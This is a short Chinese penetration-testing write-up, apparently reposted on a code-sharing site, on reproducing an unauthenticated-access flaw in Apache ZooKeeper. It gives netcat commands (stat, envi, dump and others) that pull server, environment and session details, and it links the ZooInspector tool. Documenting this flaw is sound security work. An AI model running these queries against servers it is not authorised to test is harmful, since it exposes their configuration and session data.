Apache Zookeeper 未经授权访问漏洞


 

背景:做渗透测试过程中遇到的未授权访问漏洞,记录一下复现过程。

 

 

 stat:列出关于性能和连接的客户端的统计信息。

echo stat |nc 127.0.0.1 2181

 

 

 


ruok:测试服务器是否运行在非错误状态。

echo ruok |nc 127.0.0.1 2181


reqs:列出未完成的请求。

echo reqs |nc 127.0.0.1 2181


 


envi:打印有关服务环境的详细信息。

echo envi |nc 127.0.0.1 2181

 

 


dump:列出未完成的会话和临时节点。

echo dump |nc 127.0.0.1 2181

 

 




利用ZOOKEEPER可视化管理工具进行连接
下载地址:https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

 

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM